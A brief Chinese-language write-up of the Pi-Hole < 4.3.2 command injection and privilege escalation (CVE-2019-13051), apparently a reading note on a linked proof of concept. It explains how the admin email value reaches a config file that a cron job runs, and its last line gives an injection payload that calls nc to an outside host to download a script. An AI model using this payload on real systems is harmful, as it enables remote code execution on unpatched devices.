技术文章阅读-Pi-Hole < 4.3.2 Command Injection & PrivEsc (CVE-2019-13051)

https://github.com/Mr-xn/Penetration_Testing_POC/tree/master/CVE-2019-13051

 

 

命令注入挺常见的，不过他这个地方的触发方式还挺少见。

管理员登陆之后有个修改管理员邮箱的地方，写入的值会被保存到配置文件/etc/pihole/setupVars.conf

同时有个计划任务，每十分钟会解析并执行一次这个配置文件。

 

代码里面也只是对邮箱地址的格式做了简单的过滤和检查

"`nc${IFS}192.168.1.69${IFS}4444>/tmp/revshell.py`"@example.com